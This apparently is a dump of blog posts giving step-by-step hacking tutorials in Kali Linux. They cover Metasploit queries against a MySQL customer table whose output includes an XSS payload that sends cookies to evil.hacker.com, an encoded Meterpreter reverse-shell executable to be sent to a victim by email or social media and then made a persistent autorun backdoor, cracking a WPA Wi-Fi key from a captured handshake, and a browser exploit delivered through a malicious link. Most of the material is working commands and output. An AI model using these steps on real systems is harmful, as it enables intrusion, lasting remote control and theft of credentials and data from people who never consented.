<span style="background-color: #fce5cd;"> - ColumnName: balance</span><br />
<span style="background-color: #fce5cd;"> ColumnType: decimal(10,2)</span><br />
<span style="background-color: #fce5cd;"> - ColumnName: address</span><br />
<span style="background-color: #fce5cd;"> ColumnType: varchar(500)</span><br />
<span style="background-color: #fce5cd;"> - ColumnName: mobile</span><br />
<span style="background-color: #fce5cd;"> ColumnType: varchar(50)</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">[*] Scanned 1 of 1 hosts (100% complete)</span><br />
<span style="background-color: #fce5cd;">[*] Auxiliary module execution completed</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<br />
<br />
7) <span style="color: blue;">Run SQL Query</span><br />
<br />
<span style="background-color: #fff2cc;">msf auxiliary(mysql_enum) > <b>use auxiliary/admin/mysql/mysql_sql</b></span><br />
<span style="background-color: #fff2cc;"><br /></span>
<span style="background-color: #fff2cc;">msf auxiliary(mysql_sql) > <b>show options</b></span><br />
<span style="background-color: #fff2cc;"><br /></span>
<span style="background-color: #fff2cc;">Module options (auxiliary/admin/mysql/mysql_sql):</span><br />
<span style="background-color: #fff2cc;"><br /></span>
<span style="background-color: #fff2cc;"> Name Current Setting Required Description</span><br />
<span style="background-color: #fff2cc;"> ---- --------------- -------- -----------</span><br />
<span style="background-color: #fff2cc;"> <span style="color: red;">PASSWORD no The password for the specified username</span></span><br />
<span style="background-color: #fff2cc;"><span style="color: red;"> RHOST yes The target address</span></span><br />
<span style="background-color: #fff2cc;"> RPORT 3306 yes The target port</span><br />
<span style="background-color: #fff2cc;"> <span style="color: red;"> SQL select version() yes The SQL to execute.</span></span><br />
<span style="background-color: #fff2cc;"><span style="color: red;"> USERNAME no The username to authenticate as</span></span><br />
<span style="background-color: #fff2cc;"><br /></span>
<span style="background-color: #fff2cc;">msf auxiliary(mysql_sql) > <b>set RHOST 192.168.122.1</b></span><span style="background-color: #fff2cc;"> </span><br />
<span style="background-color: #fff2cc;">RHOST => 192.168.122.1</span><br />
<span style="background-color: #fff2cc;"><br /></span>
<span style="background-color: #fff2cc;">msf auxiliary(mysql_sql) > <b>set username shabbir</b><br />username => shabbir</span><br />
<span style="background-color: #fff2cc;"><br />msf auxiliary(mysql_sql) > <b>set password shabbir</b><br />password => shabbir</span><br />
<span style="background-color: #fff2cc;"><br />msf auxiliary(mysql_sql) > <b>set sql select * from mybank.customer</b><br />sql => select * from mybank.customer<br /> </span><br />
<span style="background-color: #fff2cc;">msf auxiliary(mysql_sql) > <b>run</b><br /><br />[*] Sending statement: 'select * from mybank.customer'...<br />[*] | batul | dahod | batul ben dahod | 1234 | 25000.00 | fdfdfdfdfd | 5454545454 |<br />[*] | shabbir | shabbir | shabbir rangwala | 1000 | 49000.00 | dkdkdkdkd dkdkdkdkd | 193933030 |<br />[*] | taher | taher | taher saifee | 2000 | 8000.00 | dddl fkfkfl flflflfll | 122222233 |<br />[*] | trudy | trudy | trudy chennai | 1050 | 20000.00 | <a href=# onclick="document.location='http://evil.hacker.com/xss.php?c='+escape(document.cookie);"My Address</a> | 2345678531 |<br />[*] Auxiliary module execution completed</span><br />
<br />
<br /></div>
Shabbir Rangwalahttp://www.blogger.com/profile/06038985133173388069noreply@blogger.com4tag:blogger.com,1999:blog-1164086323266606043.post-88380489312226163232015-06-25T15:10:00.000+05:302015-06-25T22:23:56.216+05:30Install Backdoor in Windows XP using Metasploit in Kali Linux<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
We have the following scenario:<br />
<br />
Victim (Windows XP Machine) IP Address: 192.168.1.2<br />
<br />
Attacker (Kali Linux Machine) IP Address: 192.168.1.3<br />
<br />
We will use Social Engineering Toolkit in Kali Linux to generate a malicious executable payload that, when made to run at the Windows XP machine,will get the attacker complete access of the victim's machine. Then the attacker will use Metasploit to install a permanent backdoor on the victim machine.<br />
<br />
We will perform the following steps:<br />
1) Create malicious payload<br />
2) Give the payload to the Victim. <br />
3) Create listener (for the payload) on the Attacker on port 443.<br />
4) When the user executes the payload, the Victim connects to the Attacker on port 443.<br />
5) Escalate privilege to Windows user SYSTEM. <br />
6) Install backdoor on the Victim.<br />
7) Create listener (for the backdoor) on the Attacker on port 80.<br />
8) Whenever the Victim boots, it automatically connects to the Attacker. <br />
<br />
Perform the following steps on the Attacker (Kali Linux) Machine:<br />
<br />
1) <span style="color: blue;">Create malicious executable payload.</span><br />
1.1) Start Social Engineering Toolkit.<br />
<span style="background-color: #fce5cd;">root@kali:~# <b>setoolkit</b></span><br />
<br />
1.2) Select option <span style="color: red;">1)</span> <span style="color: red;">Social Engineering Attacks</span><br />
<span style="background-color: #fce5cd;">set> <b>1</b></span><br />
<br />
1.3) Select option<span style="color: red;"> 4) Create a Payload and Listener</span><span style="color: red;"></span><br />
<span style="background-color: #fce5cd;">set> <b>4</b></span><br />
<span style="background-color: #fce5cd;">set:payloads> Enter the IP address for the payload (reverse):<b>192.168.1.3</b></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">What payload do you want to generate:</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"> Name: Description:</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"> 1) Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker</span><br />
<span style="background-color: #fce5cd;"> <span style="color: red;">2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker</span></span><br />
<span style="background-color: #fce5cd;"> 3) Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker</span><br />
<span style="background-color: #fce5cd;"> 4) Windows Bind Shell Execute payload and create an accepting port on remote system</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">set:payloads><b>2</b></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">Select one of the below, 'backdoored executable' is typically the best. However,</span><br />
<span style="background-color: #fce5cd;">most still get picked up by AV. You may need to do additional packing/crypting</span><br />
<span style="background-color: #fce5cd;">in order to get around basic AV detection.</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"> 1) shikata_ga_nai</span><br />
<span style="background-color: #fce5cd;"> 2) No Encoding</span><br />
<span style="background-color: #fce5cd;"> 3) Multi-Encoder</span><br />
<span style="background-color: #fce5cd;"> 4) Backdoored Executable</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">set:encoding><b>1</b></span><br />
<span style="background-color: #fce5cd;">set:payloads> PORT of the listener [443]:</span><br />
<span style="background-color: #fce5cd;">[-] Encoding the payload 4 times. [-]</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">[*] x86/shikata_ga_nai succeeded with size 314 (iteration=1)</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">[*] x86/shikata_ga_nai succeeded with size 341 (iteration=2)</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">[*] x86/shikata_ga_nai succeeded with size 368 (iteration=3)</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">[*] x86/shikata_ga_nai succeeded with size 395 (iteration=4)</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">[*] <span style="color: red;">Your payload is now in the root directory of SET as payload.exe</span></span><br />
<span style="background-color: #fce5cd;">[-] The payload can be found in the SET home directory.</span><br />
<span style="background-color: #fce5cd;">set> Start the listener now? [yes|no]: <b>no</b></span><br />
<br />
<br />
2) <span style="color: blue;">We need to send this payload file <span style="color: red;">/usr/share/set/payload.exe</span> to the Victim using social media, e-mail, uploading at a server, or any other type of choice. </span><br />
<br />
<br />
3) <span style="color: blue;">Set up a handler on the Attacker machine using Metasploit.</span><br />
3.1) Start the services.<br />
<span style="background-color: #fce5cd;">root@kali:~# <b>service postgresql start</b></span><br />
<span style="background-color: #fce5cd;">[ ok ] Starting PostgreSQL 9.1 database server: main.</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">root@kali:~# <b>service metasploit start</b></span><br />
<span style="background-color: #fce5cd;">[ ok ] Starting Metasploit rpc server: prosvc.[ ok ] Starting Metasploit web server: thin.</span><br />
<span style="background-color: #fce5cd;">[ ok ] Starting Metasploit worker: worker.</span><br />
<br />
3.2) Start metasploit console. <br />
<span style="background-color: #fce5cd;">root@kali:~# <b>msfconsole</b></span><br />
<span style="background-color: #fce5cd;">msf ></span><br />
<br />
3.3) Select exploit. <br />
<span style="background-color: #fce5cd;">msf > <b>use exploit/multi/handler</b></span><br />
<span style="background-color: #fce5cd;"><b> </b></span> <br />
3.4) Select payload.<br />
<span style="background-color: #fce5cd;">msf exploit(handler) > <b>set payload windows/meterpreter/reverse_tcp</b></span><br />
<span style="background-color: #fce5cd;">payload => windows/meterpreter/reverse_tcp</span><br />
<br />
3.5) View options<br />
<span style="background-color: #fce5cd;">msf exploit(handler) > <b>show options</b></span><br />
<span style="background-color: #fce5cd;">Module options (exploit/multi/handler):</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"> Name Current Setting Required Description</span><br />
<span style="background-color: #fce5cd;"> ---- --------------- -------- -----------</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">Payload options (windows/meterpreter/reverse_tcp):</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"> Name Current Setting Required Description</span><br />
<span style="background-color: #fce5cd;"> ---- --------------- -------- -----------</span><br />
<span style="background-color: #fce5cd;"> EXITFUNC process yes Exit technique (accepted: seh, thread, process, none)</span><br />
<span style="background-color: #fce5cd;"> <span style="color: red;">LHOST yes The listen address</span></span><br />
<span style="background-color: #fce5cd;"><span style="color: red;"> LPORT 4444 yes The listen port</span></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">Exploit target:</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"> Id Name</span><br />
<span style="background-color: #fce5cd;"> -- ----</span><br />
<span style="background-color: #fce5cd;"> 0 Wildcard Target</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: white;">3.6) Set options</span><br />
<span style="background-color: #fce5cd;">msf exploit(handler) > <b>set LHOST 192.168.1.3</b></span><br />
<span style="background-color: #fce5cd;"><span style="color: red;">LHOST => 192.168.1.3</span></span><br />
<span style="background-color: #fce5cd;">msf exploit(handler) > <b>set LPORT 443</b></span><br />
<span style="background-color: #fce5cd;"><span style="color: red;">LPORT => 443</span></span><br />
<br />
<span style="color: red;"><span style="color: black;">3.7) Execute exploit</span> </span><br />
<span style="background-color: #fce5cd;">msf exploit(handler) > <b>exploit</b></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">[*] <span style="color: red;">Started reverse handler on 192.168.1.3:443 </span></span><br />
<span style="background-color: #fce5cd;">[*] Starting the payload handler...</span><br />
<br />
<br />
4) <span style="color: blue;">As soon as the victim runs the executable file, the payload will make a connection to the attacker system, giving the attacker complete control of the victim machine.</span><br />
<br />
<span style="background-color: #fce5cd;">[*] Sending stage (769536 bytes) to 192.168.1.2</span><br />
<span style="background-color: #fce5cd;">[*]<span style="color: red;"> Meterpreter session 1 opened (192.168.1.3:443 -> 192.168.1.2:1038)</span> at 2015-06-25 06:52:57 +0530</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">meterpreter > <b>sysinfo</b></span><br />
<span style="background-color: #fce5cd;">Computer : WINSETU</span><br />
<span style="background-color: #fce5cd;">OS : Windows XP (Build 2600, Service Pack 2).</span><br />
<span style="background-color: #fce5cd;">Architecture : x86</span><br />
<span style="background-color: #fce5cd;">System Language : en_US</span><br />
<span style="background-color: #fce5cd;">Meterpreter : x86/win32</span><br />
<span style="background-color: #fce5cd;">meterpreter > </span><br />
<br />
5) <span style="color: blue;">Escalate privilege</span><br />
<br />
<span style="background-color: #fce5cd;">meterpreter > <b>getuid</b></span><br />
<span style="background-color: #fce5cd;">Server username: <span style="color: red;">WINSETU\shabbir</span></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">meterpreter > <b>getsystem</b></span><br />
<span style="background-color: #fce5cd;">...got system (via technique 1).</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">meterpreter > <b>getuid</b></span><br />
<span style="background-color: #fce5cd;">Server username: <span style="color: red;">NT AUTHORITY\SYSTEM</span></span><br />
<br />
<br />
6) <span style="color: blue;">Install backdoor on the victim machine.</span><br />
<br />
<span style="background-color: #fce5cd;">meterpreter > <b>run persistence -h</b></span><br />
<span style="background-color: #fce5cd;">Meterpreter Script for creating a persistent backdoor on a target host.</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">OPTIONS:</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"> -A Automatically start a matching multi/handler to connect to the agent</span><br />
<span style="background-color: #fce5cd;"> -L <opt> Location in target host where to write payload to, if none %TEMP% will be used.</span><br />
<span style="background-color: #fce5cd;"> -P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.</span><br />
<span style="background-color: #fce5cd;"> -S Automatically start the agent on boot as a service (with SYSTEM privileges)</span><br />
<span style="background-color: #fce5cd;"> -T <opt> Alternate executable template to use</span><br />
<span style="background-color: #fce5cd;"> -U Automatically start the agent when the User logs on</span><br />
<span style="background-color: #fce5cd;"> <span style="color: red;"> -X Automatically start the agent when the system boots</span></span><br />
<span style="background-color: #fce5cd;"> -h This help menu</span><br />
<span style="background-color: #fce5cd;"> <span style="color: red;"> -i <opt> The interval in seconds between each connection attempt</span></span><br />
<span style="background-color: #fce5cd;"><span style="color: red;"> -p <opt> The port on the remote host where Metasploit is listening</span></span><br />
<span style="background-color: #fce5cd;"> <span style="color: red;"> -r <opt> The IP of the system running Metasploit listening for the connect back</span></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">meterpreter > <b>run persistence -X -i 10 -p 80 -r 192.168.1.3</b></span><br />
<span style="background-color: #fce5cd;">[*] Running Persistance Script</span><br />
<span style="background-color: #fce5cd;">[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WINSETU_20150625.1651/WINSETU_20150625.1651.rc</span><br />
<span style="background-color: #fce5cd;">[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=80</span><br />
<span style="background-color: #fce5cd;">[*] Persistent agent script is 148439 bytes long</span><br />
<span style="background-color: #fce5cd;">[+] Persistent Script written to C:\DOCUME~1\shabbir\LOCALS~1\Temp\RXdYyZmSEBJVd.vbs</span><br />
<span style="background-color: #fce5cd;">[*] Executing script C:\DOCUME~1\shabbir\LOCALS~1\Temp\RXdYyZmSEBJVd.vbs</span><br />
<span style="background-color: #fce5cd;">[+] Agent executed with PID 3648</span><br />
<span style="background-color: #fce5cd;">[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\YHxeQVYtYjmIYu</span><br />
<span style="background-color: #fce5cd;">[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\YHxeQVYtYjmIYu</span><br />
<span style="background-color: #fce5cd;">meterpreter > </span><br />
<span style="background-color: #fce5cd;"><br /></span>
<br />
7) <span style="color: blue;">Install handler for the backdoor on the Attacker machine listening on port 80.</span><br />
<span style="background-color: #fce5cd;">meterpreter > <b>background</b></span><br />
<span style="background-color: #fce5cd;">[*] Backgrounding session 1...</span><br />
<br />
<span style="background-color: #fce5cd;">msf exploit(handler) > <b>use exploit/multi/handler </b></span><span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">msf exploit(handler) > <b>set payload windows/meterpreter/reverse_tcp</b></span><br />
<span style="background-color: #fce5cd;">payload => windows/meterpreter/reverse_tcp</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">msf exploit(handler) > <b>set LHOST 192.168.1.3</b></span><br />
<span style="background-color: #fce5cd;"><span style="color: red;">LHOST => 192.168.1.3</span></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">msf exploit(handler) > <b>set LPORT 80</b></span><br />
<span style="background-color: #fce5cd;"><span style="color: red;">LPORT => 80</span></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">msf exploit(handler) > <b>exploit</b></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">[*] Started reverse handler on 192.168.1.3:80 </span><br />
<span style="background-color: #fce5cd;">[*] Starting the payload handler...</span><br />
<br />
<br />
8) <span style="color: blue;">Now, whenever the victim machine boots, it will automatically connect to the Attacker machine on port 80.</span><br />
<span style="background-color: #fce5cd;">[*] Sending stage (769536 bytes) to 192.168.1.2</span><span style="background-color: #fce5cd;">[*]</span><br />
<span style="background-color: #fce5cd;"> <span style="color: red;">Meterpreter session 2 opened (192.168.1.3:80 -> 192.168.1.2:1051)</span> at 2015-06-25 07:19:35 +0530</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">meterpreter > </span><br />
<br />
<br /></div>
Shabbir Rangwalahttp://www.blogger.com/profile/06038985133173388069noreply@blogger.com7tag:blogger.com,1999:blog-1164086323266606043.post-29777151001692088792015-06-22T18:35:00.000+05:302015-06-24T11:24:21.953+05:30Hack WPA/WPA2 Wi-Fi with aircrack-ng in Kali Linux.<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
In this tutorial, we use 'aircrack-ng' in Kali Linux to crack a WPA wifi network. <br />
<br />
Perform the following steps on the Kali Linux machine.<br />
<br />
1) Disconnect from all wireless networks.<br />
<br />
2) Verify that your wireless card supports monitor mode.<br />
<span style="background-color: #fce5cd;"><span style="color: black;">root@kali:~# <b>airmon-ng</b></span></span><br />
<span style="background-color: #fce5cd;"><span style="color: black;"><br /></span></span>
<span style="background-color: #fce5cd;"><span style="color: black;">Interface Chipset Driver</span></span><br />
<span style="background-color: #fce5cd;"><span style="color: black;"><br /></span></span>
<span style="background-color: #fce5cd;"><span style="color: black;">wlan0 Atheros AR9285 ath9k - [phy0]</span></span><br />
<br />
If your wireless card is not listed above, then it does not support monitor mode and you cannot continue. <br />
<br />
3) Enable Monitor mode<br />
<span style="background-color: #fce5cd;">root@kali:~#<b> airmon-ng start wlan0</b></span><br />
<span style="background-color: #fce5cd;">Found 2 processes that could cause trouble.</span><br />
<span style="background-color: #fce5cd;">If airodump-ng, aireplay-ng or airtun-ng stops working after</span><br />
<span style="background-color: #fce5cd;">a short period of time, you may want to kill (some of) them!</span><br />
<span style="background-color: #fce5cd;">-e</span><br />
<span style="background-color: #fce5cd;">PID Name</span><br />
<span style="background-color: #fce5cd;">2550 NetworkManager</span><br />
<span style="background-color: #fce5cd;">2658 wpa_supplicant</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">Interface Chipset Driver</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">wlan0 Atheros AR9285 ath9k - [phy0]</span><br />
<span style="background-color: #fce5cd;"> <span style="color: red;">(monitor mode enabled on mon0)</span></span><br />
<br />
Note the name of the new monitor interface, <span style="color: red;">mon0</span><br />
<br />
4) Disable wireless card from connecting to the internet, allowing it to focus on monitor mode instead.<br />
<span style="background-color: #fce5cd;">root@kali:~#<b> ifconfig wlan0 down</b></span><br />
<br />
5) List all the wireless networks in range.<br />
<span style="background-color: #fce5cd;">root@kali:~# <b>airodump-ng mon0</b></span><br />
<span style="background-color: #fce5cd;"> BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID</span><br />
<span style="background-color: #fce5cd;"> </span><br />
<span style="background-color: #fce5cd;"> <span style="color: red;">54:B8:0A:89:76:4E -33 16 10 4 1 54e WPA TKIP PSK SHABBIR </span> </span><br />
<span style="background-color: #fce5cd;"> 94:D7:23:0C:09:20 -77 20 51 0 11 54e WPA CCMP PSK MTNL </span><br />
<span style="background-color: #fce5cd;"> 9C:D6:43:CC:04:B8 -80 11 0 0 2 54e. WPA2 CCMP PSK dlink </span><br />
<span style="background-color: #fce5cd;"> 10:7B:EF:A6:26:80 -80 3 0 0 11 54e WPA2 CCMP PSK TATA </span> <br />
<br />
Locate your network. Press <b>Ctrl+C</b> to stop the process. And note down the <span style="color: red;">BSSID</span> and<span style="color: red;"> CH (channel)</span>. <br />
<br />
<br />
6) Monitor only the target network and wait for a device to connect to the network and then capture the four-way handshake.<br />
<span style="background-color: #fce5cd;">root@kali:~# <b>airodump-ng -c 1 --bssid 54:B8:0A:89:76:4E -w Desktop/wpa mon0</b></span><br />
<br />
Where,<br />
<span style="color: red;">-c 1</span> -> channel of network is 1 (as seen in the previous output)<br />
<span style="color: red;">--bssid 54:B8:0A:89:76:4E</span> -> BSSID copied from the previous output (The MAC address of the Access Point).<br />
<span style="color: red;">-w Desktop/wpa</span> -> file name where the handshake will be saved.<br />
<span style="color: red;">mon0</span> -> the monitor interface<br />
<br />
<br />
7) What we are really doing now is waiting for a device to connect to the network, so that we can capture the four-way handshake which we need in order to crack the password. Also, four files will show up on your desktop. This is where the handshake will be saved. <br />
<br />
When a device connects to the network, the following message appears on the airodump screen<span style="color: red;"> "<span style="color: red;">WPA handshake: </span> </span><span style="color: red;"><span style="color: red;">54:B8:0A:89:76:4E"<span style="color: black;"> as shown below:</span></span> </span> <br />
<br />
<span style="background-color: #fce5cd;"> CH 1 ][ Elapsed: 32 s ][ 2015-06-22 09:56 ][ <span style="color: red;">WPA handshake: 54:B8:0A:89:76:4E </span></span><br />
<span style="background-color: #fce5cd;"> </span><br />
<span style="background-color: #fce5cd;"> BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID</span><br />
<span style="background-color: #fce5cd;"> </span><br />
<span style="background-color: #fce5cd;"> 54:B8:0A:89:76:4E -29 1 314 6 0 1 54e WPA TKIP PSK SHABBIR </span><br />
<span style="background-color: #fce5cd;"> </span><br />
<span style="background-color: #fce5cd;"> BSSID STATION PWR Rate Lost Frames Probe </span><br />
<span style="background-color: #fce5cd;"> </span><br />
<span style="background-color: #fce5cd;"> 54:B8:0A:89:76:4E 0C:EE:E6:C0:37:43 -26 1e-54 0 9 </span><br />
<br />
<br />The handshake has been captured. Press <b>Ctrl+C</b> on the airodump terminal to stop monitoring the network. <br />
<br />
8) Launch the process of cracking the password. However, it will only crack it if the password happens to be in the wordlist that you have selected.<br />
<span style="background-color: #fce5cd;"><b>root@kali:~# aircrack-ng -a2 -b 54:B8:0A:89:76:4E -w /usr/share/wordlists/fern-wifi/common.txt Desktop/*.cap</b></span><br />
<br />
<span style="background-color: #fce5cd;">Opening Desktop/wpa-04.cap</span><br />
<span style="background-color: #fce5cd;">Reading packets, please wait...</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"> Aircrack-ng 1.2 beta3</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"> [00:00:00] 4 keys tested (254.57 k/s)</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"> KEY FOUND! [ <span style="color: red;">goodadmin</span> ]</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"> Master Key : 9A CD 12 5D 29 22 11 C7 6A 3D 75 0D 9D A7 76 C1 </span><br />
<span style="background-color: #fce5cd;"> F1 2A 9B 9A 57 DD A9 EA 11 26 B0 EB 40 09 1E EB </span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"> Transient Key : 5A 15 F5 AD 5A F6 1F 00 78 F5 5F 0F 87 46 8C 81 </span><br />
<span style="background-color: #fce5cd;"> DA 1F B4 8B 7C B2 C9 24 4B 63 6D EF 64 88 30 67 </span><br />
<span style="background-color: #fce5cd;"> 66 E4 5E 30 5E 4C C1 E1 F5 47 8A 7F AE F0 A6 FB </span><br />
<span style="background-color: #fce5cd;"> BF 7B 9E A6 AB ED B6 1B 43 15 43 D1 EF 6E C2 49 </span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"> EAPOL HMAC : 79 56 57 C1 85 7D D8 A4 CD 89 B3 34 A5 36 D0 77 </span><br />
<span style="background-color: #fce5cd;"><br /></span>
<br />
Where,<br />
<span style="color: red;">-a</span> is the method used to crack the handshake. 2=WPA method <br />
<span style="color: red;">-b </span>is the BSSID of the target access point <br />
<span style="color: red;">-w</span> is the path to the wordlist<br />
<span style="color: red;">Desktop/*.cap</span> is the path to the .cap file captured in the handshake.<br />
<br />
<br />
9) After completing the hack, disable mon0, and enable wlan0 to be able to connect to the Internet.<br />
<br />
<span style="background-color: #fce5cd;">root@kali:~# <b>ifconfig mon0 down</b></span><br />
<span style="background-color: #fce5cd;">root@kali:~# <b>ifconfig wlan0 up</b></span><br />
<br />
<br />
<br />
<br />
<br />
</div>
Shabbir Rangwalahttp://www.blogger.com/profile/06038985133173388069noreply@blogger.com3tag:blogger.com,1999:blog-1164086323266606043.post-61123953347705000042015-06-21T18:21:00.001+05:302015-06-21T18:21:54.134+05:30Hack Windows 7 by using Kali Linux<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
In this tutorial, we will exploit "Internet Explorer CSS recursive call memory corrruption" vulnerability in <span style="color: red;">Internet Explorer 8</span> in <span style="color: red;">Windows 7 Service Pack 1 (unpatched)</span> using Metasploit in Kali Linux and get a remote shell on the Windows 7 machine.<br />
<br />
We have the following configuration: Windows 7 IP Address: <span style="color: red;">192.168.122.10 </span><br />
Kali Linux IP Address: <span style="color: red;">192.168.122.115 </span><br />
<br />
Perform the following steps on the Kali Linux Machine<br />
<br />
1) <span style="color: blue;">Start the services.</span><br />
root@kali:~# <b>service postgresql start</b><br />
[ ok ] Starting PostgreSQL 9.1 database server: main.<br />
<br />
root@kali:~# <b>service metasploit start</b><br />
[ ok ] Starting Metasploit rpc server: prosvc.[ ok ] Starting Metasploit web server: thin.<br />
[ ok ] Starting Metasploit worker: worker.<br />
<br />
<br />
2) <span style="color: blue;">Start metasploit console. </span><br />
root@kali:~# <b>msfconsole</b><br />
msf ><br />
<br />
3) <span style="color: blue;">Select exploit. </span><br />
msf > <b>use exploit/windows/browser/ms11_003_ie_css_import </b><br />
<br />
4) <span style="color: blue;">Select payload.<b> </b> </span><br />
msf exploit(ms11_003_ie_css_import) > <b>set payload windows/meterpreter/reverse_tcp</b><br />
payload => windows/meterpreter/reverse_tcp<br />
<br />
<br />
5) <span style="color: blue;">View options. </span><br />
msf exploit(ms11_003_ie_css_import) > <b>show options</b><br />
<br />
Module options (exploit/windows/browser/ms11_003_ie_css_import):<br />
<br />
Name Current Setting Required Description<br />
---- --------------- -------- -----------<br />
OBFUSCATE true no Enable JavaScript obfuscation<br />
<span style="color: red;"> SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0<br /> SRVPORT 8080 yes The local port to listen on.</span><br />
SSL false no Negotiate SSL for incoming connections<br />
SSLCert no Path to a custom SSL certificate (default is randomly generated)<br />
<span style="color: red;"> URIPATH no The URI to use for this exploit (default is random)</span><br />
<br />
Payload options (windows/meterpreter/reverse_tcp):<br />
<br />
Name Current Setting Required Description<br />
---- --------------- -------- -----------<br />
EXITFUNC process yes Exit technique (accepted: seh, thread, process, none)<br />
<span style="color: red;">LHOST yes The listen address<br /> LPORT 4444 yes The listen port</span><br />
Exploit target:<br />
<br />
Id Name<br />
-- ----<br />
0 Automatic<br />
<br />
<br />
6) <span style="color: blue;">Set options</span><br />
msf exploit(ms11_003_ie_css_import) > <b>set URIPATH /</b><br />
URIPATH => /<br />
msf exploit(ms11_003_ie_css_import) > <b>set LHOST 192.168.122.115</b><br />
LHOST => 192.168.122.115<br />
<br />
7) <span style="color: blue;">Execute the exploit. </span><br />
msf exploit(ms11_003_ie_css_import) > <b>exploit</b><br />
[*] Exploit running as background job.<br />
<br />
[*] <span style="color: red;">Started reverse handler on 192.168.122.115:4444 </span><br />
msf exploit(ms11_003_ie_css_import) > [*] Using URL: http://0.0.0.0:8080/<br />
[*] Local IP: <i><span style="color: red;">http://192.168.122.115:8080/</span></i><br />
[*] Server started.<br />
<br />
<br />
8) <span style="color: blue;">User clicks on the malicious URL.</span> As we can see, a link has been generated as a result of the exploit command. This is the malicious link <i><span style="color: red;">http://192.168.122.115:8080/ </span></i><span style="color: red;"><span style="color: black;">that we will have to send to our target, so that it can exploit their browser.</span></span><br />
<br />
When
the user clicks on the malicious link, the browser will try to load the
page, but nothing will be displayed. But you will get a remote shell on
your msfconsole, as shown below.<br />
<br />
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/"<br />
[*] 192.168.122.10 ms11_003_ie_css_import - Sending redirect<br />
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/iPKMV.html"<br />
[*] 192.168.122.10 ms11_003_ie_css_import - Sending HTML<br />
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/generic-1434889455.dll"<br />
[*] 192.168.122.10 ms11_003_ie_css_import - Sending .NET DLL<br />
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/favicon.ico"<br />
